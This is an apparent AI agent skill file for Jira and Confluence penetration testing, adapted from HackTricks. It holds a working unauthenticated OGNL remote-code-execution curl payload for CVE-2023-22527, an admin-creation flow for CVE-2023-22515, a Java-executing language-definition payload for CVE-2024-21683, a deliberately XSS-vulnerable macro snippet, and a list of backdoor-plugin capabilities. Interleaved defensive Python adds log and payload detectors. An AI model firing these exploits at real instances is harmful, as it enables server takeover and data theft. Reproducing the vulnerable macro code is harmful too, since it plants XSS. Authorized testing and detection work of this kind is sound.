Hacktricks-skills jira-confluence-pentest

Security assessment and penetration testing for Jira and Confluence instances. Use this skill whenever the user needs to enumerate Jira/Confluence privileges, test for known vulnerabilities (CVE-2023-22527, CVE-2023-22515, CVE-2024-21683), assess plugin security, or perform reconnaissance on Atlassian products. Trigger on requests about Jira security, Confluence pentesting, Atlassian vulnerability scanning, privilege enumeration, or RCE testing against these platforms.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/jira/SKILL.MD
source content

Jira & Confluence Security Assessment

A skill for performing security assessments and penetration testing on Jira and Confluence instances.

Quick Start

# Check Jira privileges (authenticated or not)
./scripts/jira_privilege_check.sh https://jira.example.com

# Scan Confluence for known CVEs
./scripts/confluence_cve_scan.sh https://confluence.example.com

# Test specific RCE vulnerabilities
./scripts/confluence_rce_poc.sh https://confluence.example.com CVE-2023-22527

Jira Privilege Enumeration

Check Current User Permissions

Jira exposes permission endpoints that reveal the current user's privileges. This is useful for:

  • Identifying misconfigurations where anonymous users have elevated privileges
  • Understanding what actions an authenticated user can perform
  • Finding privilege escalation opportunities

Endpoints:

  • /rest/api/2/mypermissions
  • /rest/api/3/mypermissions

Important: Since February 1st, 2019, the mypermissions endpoint requires a permissions query parameter specifying which permissions to check.

Available Permissions:

ADD_COMMENTS, ADMINISTER, ADMINISTER_PROJECTS, ASSIGNABLE_USER, ASSIGN_ISSUES,
BROWSE_PROJECTS, BULK_CHANGE, CLOSE_ISSUES, CREATE_ATTACHMENTS, CREATE_ISSUES,
CREATE_PROJECT, CREATE_SHARED_OBJECTS, DELETE_ALL_ATTACHMENTS, DELETE_ALL_COMMENTS,
DELETE_ALL_WORKLOGS, DELETE_ISSUES, DELETE_OWN_ATTACHMENTS, DELETE_OWN_COMMENTS,
DELETE_OWN_WORKLOGS, EDIT_ALL_COMMENTS, EDIT_ALL_WORKLOGS, EDIT_ISSUES,
EDIT_OWN_COMMENTS, EDIT_OWN_WORKLOGS, LINK_ISSUES, MANAGE_GROUP_FILTER_SUBSCRIPTIONS,
MANAGE_SPRINTS_PERMISSION, MANAGE_WATCHERS, MODIFY_REPORTER, MOVE_ISSUES,
RESOLVE_ISSUES, SCHEDULE_ISSUES, SET_ISSUE_SECURITY, SYSTEM_ADMIN,
TRANSITION_ISSUES, USER_PICKER, VIEW_AGGREGATED_DATA, VIEW_DEV_TOOLS,
VIEW_READONLY_WORKFLOW, VIEW_VOTERS_AND_WATCHERS, WORK_ON_ISSUES

Example:

curl "https://jira.example.com/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS" | jq

Look for:

  • "havePermission": true for anonymous users (security vulnerability)
  • Unexpected privileges for authenticated users
  • ADMINISTER, SYSTEM_ADMIN, or ADMINISTER_PROJECTS permissions
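As an added example (not part of the skill or its scripts), a small Python helper that takes the parsed mypermissions response and flags granted permissions an auditor should care about, holding anonymous callers to a stricter bar than authenticated ones. The sample response is constructed to match the endpoint's shape, and the risk tiers are my own grouping of the permission keys listed above.

```python
import json

# Risk tiers are my own grouping of the permission keys listed above.
ADMIN_RISK = {"ADMINISTER", "SYSTEM_ADMIN", "ADMINISTER_PROJECTS"}
WRITE_RISK = {"CREATE_ISSUES", "EDIT_ISSUES", "DELETE_ISSUES", "CREATE_ATTACHMENTS",
              "ADD_COMMENTS", "BULK_CHANGE", "CREATE_PROJECT"}

def flag_permissions(mypermissions_json, anonymous=True):
    """Return {permission_key: severity} for granted permissions worth reporting.

    mypermissions_json is the parsed body of /rest/api/2/mypermissions: each
    entry under "permissions" carries a "havePermission" boolean.
    Admin-level grants are critical for any caller. For an anonymous caller,
    write permissions are high and anything beyond BROWSE_PROJECTS is at least
    informational; for an authenticated caller only the admin tier is reported.
    """
    findings = {}
    for key, entry in mypermissions_json.get("permissions", {}).items():
        if not entry.get("havePermission"):
            continue
        if key in ADMIN_RISK:
            findings[key] = "critical"
        elif anonymous and key in WRITE_RISK:
            findings[key] = "high"
        elif anonymous and key != "BROWSE_PROJECTS":
            findings[key] = "info"
    return findings

# Constructed sample mimicking the response shape; not a capture from a real instance.
SAMPLE_RESPONSE = json.loads("""
{ "permissions": {
    "BROWSE_PROJECTS":     {"key": "BROWSE_PROJECTS",     "havePermission": true},
    "CREATE_ISSUES":       {"key": "CREATE_ISSUES",       "havePermission": true},
    "ADMINISTER_PROJECTS": {"key": "ADMINISTER_PROJECTS", "havePermission": false},
    "ADMINISTER":          {"key": "ADMINISTER",          "havePermission": true}
}}
""")

if __name__ == "__main__":
    for perm, sev in sorted(flag_permissions(SAMPLE_RESPONSE).items()):
        print(f"[{sev}] anonymous caller holds {perm}")
```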

Automated Enumeration Tools

Confluence Vulnerability Testing

CVE-2023-22527 – Unauthenticated Template Injection RCE

Affected Versions: Confluence Data Center/Server 8.0.x–8.5.3 & 8.4.5

Description: Vulnerable Velocity template text-inline.vm allows OGNL evaluation without authentication.

Proof of Concept:

curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'

Detection: Response header x-cmd will contain command output.

Scanner: Use nuclei template http/cves/2023/CVE-2023-22527.yaml (nuclei-templates ≥9.7.5)

CVE-2023-22515 – Setup Reactivation Admin Creation

Affected Versions: Confluence Data Center/Server 8.0.0–8.5.1

Description: Publicly reachable instances allow flipping setupComplete and re-running setup to create a new admin account.

Exploit Flow:

  1. GET /server-info.action – Verify reachability
  2. POST /server-info.action – Toggle setup flag with buildNumber parameters
  3. POST /setup/setupadministrator.action – Create admin with fullName, email, username, password, confirm
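On the defensive side, the two unauthenticated issues above (CVE-2023-22527 and CVE-2023-22515) both leave distinctive request paths in the web server log. The following Python is an added example, not part of the skill: it parses combined-format access log lines (constructed samples, not real captures) and tags the requests that match either issue. The rule set is my own reading of the paths and methods named above.

```python
import re

# Apache/Tomcat "combined" access log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(method, path):
    """Return the CVE identifier a single request matches, or None.

    CVE-2023-22527: any request to the text-inline.vm Velocity template.
    CVE-2023-22515: a POST to server-info.action (the setup-flag toggle step)
    or any request to the setup wizard on an instance whose setup is complete.
    A plain GET to server-info.action is not flagged on its own: it doubles as
    an ordinary reachability check and would be too noisy.
    """
    p = path.split("?", 1)[0]  # match on the path only, query string dropped
    if p.endswith("/template/aui/text-inline.vm"):
        return "CVE-2023-22527"
    if p.endswith("/server-info.action") and method == "POST":
        return "CVE-2023-22515"
    if "/setup/setupadministrator.action" in p:
        return "CVE-2023-22515"
    return None

def scan_log(lines):
    """Return a list of (cve, client_ip, method, path, status) for matching lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cve = classify(m["method"], m["path"])
        if cve:
            hits.append((cve, m["ip"], m["method"], m["path"], int(m["status"])))
    return hits

# Constructed sample lines (documentation-range IPs), not a real capture.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /login.action HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Jan/2024:12:00:02 +0000] "POST /template/aui/text-inline.vm?label=x HTTP/1.1" 200 412',
    '198.51.100.9 - - [10/Jan/2024:12:05:10 +0000] "GET /server-info.action HTTP/1.1" 200 880',
    '198.51.100.9 - - [10/Jan/2024:12:05:11 +0000] "POST /server-info.action HTTP/1.1" 302 0',
    '198.51.100.9 - - [10/Jan/2024:12:05:12 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for cve, ip, method, path, status in scan_log(SAMPLE_LOG):
        print(f"{cve}: {ip} {method} {path} -> {status}")
```

A context-path prefix (for example /confluence) is handled because matching uses endswith on the path, not equality.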

CVE-2024-21683 – Authenticated RCE via Code Macro

Affected Versions: Confluence with Code Macro plugin

Description: Admin can upload crafted language definition; Rhino engine executes embedded Java, leading to RCE.

Payload Template:

<?xml version="1.0"?>
<languages>
  <language key="pwn" name="pwn" namespace="java.lang">
    <tokens>
      <token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
    </tokens>
  </language>
</languages>

Trigger: Select malicious language in any Code Macro body.

Automation: Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
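For CVE-2024-21683 the attack artifact is the uploaded language definition itself, so a pre-upload gate or a post-incident review can scan it. This Python is an added example, not part of the skill or of the Code Macro plugin: it parses a language definition XML and flags JVM namespaces and tokens that carry evaluation or reflection markers. The marker list is a heuristic of my own, seeded from the payload template above; the sample definitions are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic markers (my own list, seeded from the payload template above): the
# ${...} evaluation syntax plus Java reflection / process-execution calls.
SUSPICIOUS = re.compile(r'\$\{|getClass\(\)|\.forName\(|java\.lang\.Runtime|ProcessBuilder|\.exec\(')
# A syntax-highlighting definition has no business naming a JVM package as its namespace.
JVM_NAMESPACE = re.compile(r'^(java|javax|jdk|sun)\.')

def audit_language_definition(xml_text):
    """Return a list of (language_key, reason) findings for a Code Macro
    language definition; an empty list means nothing suspicious was found."""
    findings = []
    root = ET.fromstring(xml_text)
    for lang in root.iter("language"):
        key = lang.get("key", "?")
        ns = lang.get("namespace", "")
        if JVM_NAMESPACE.match(ns):
            findings.append((key, f"namespace {ns!r} is a JVM package"))
        for tok in lang.iter("token"):
            m = SUSPICIOUS.search(tok.text or "")
            if m:
                findings.append((key, f"token contains {m.group(0)!r}"))
    return findings

# Constructed samples. The first mirrors the payload template on this page; the
# second is a harmless definition with a single comment-highlighting token.
MALICIOUS = """<languages>
  <language key="pwn" name="pwn" namespace="java.lang">
    <tokens>
      <token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
    </tokens>
  </language>
</languages>"""

BENIGN = """<languages>
  <language key="ini" name="INI">
    <tokens>
      <token scope="comment">;.*</token>
    </tokens>
  </language>
</languages>"""

if __name__ == "__main__":
    for key, reason in audit_language_definition(MALICIOUS):
        print(f"[{key}] {reason}")
    print("benign findings:", audit_language_definition(BENIGN))
```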

Plugin Security Assessment

Plugin Module Types

Atlassian plugins can expose various attack surfaces:

  • REST Plugin Module: Exposes RESTful API endpoints
  • Servlet Plugin Module: Deploys Java servlets
  • Macro Plugin Module: Implements parameterized HTML templates

Common Vulnerabilities

XSS in Macros: Macro plugins often reflect user input without proper sanitization. Example vulnerable pattern:

public String execute(Map<String, String> map, String body, ConversionContext conversionContext) {
    if (map.get("Name") != null) {
        // XSS: the "Name" macro parameter is user-controlled and is concatenated into HTML unescaped
        return ("<h1>Hello " + map.get("Name") + "!</h1>");
    }
    return "<h1>Hello World!</h1>";
}

XSS Payloads: See https://github.com/cyllective/XSS-Payloads/tree/main/Confluence

Backdoor Plugin Capabilities

Malicious plugins can perform:

  • Hide from Admins: Inject JavaScript to hide plugin from UI
  • Data Exfiltration: Access and exfiltrate attachments and pages
  • Session Token Theft: Echo headers in response, leak cookies via JavaScript
  • Command Execution: Execute arbitrary code
  • Reverse Shell: Establish reverse shell connections
  • DOM Proxying: Tunnel through browser to internal network

Reference: https://github.com/cyllective/malfluence

Assessment Workflow

  1. Reconnaissance
    • Identify Jira/Confluence version
    • Check for exposed endpoints
    • Enumerate available plugins
  2. Privilege Enumeration
    • Test anonymous access to /rest/api/2/mypermissions
    • Check authenticated user permissions
    • Look for privilege escalation paths
  3. Vulnerability Scanning
    • Run CVE-2023-22527 check (unauthenticated)
    • Test CVE-2023-22515 if setup endpoint accessible
    • Check for CVE-2024-21683 if authenticated admin access
  4. Plugin Analysis
    • Review installed plugins
    • Test for XSS in macro plugins
    • Check for custom REST endpoints
  5. Exploitation
    • Use appropriate payloads based on findings
    • Document all steps for reporting

References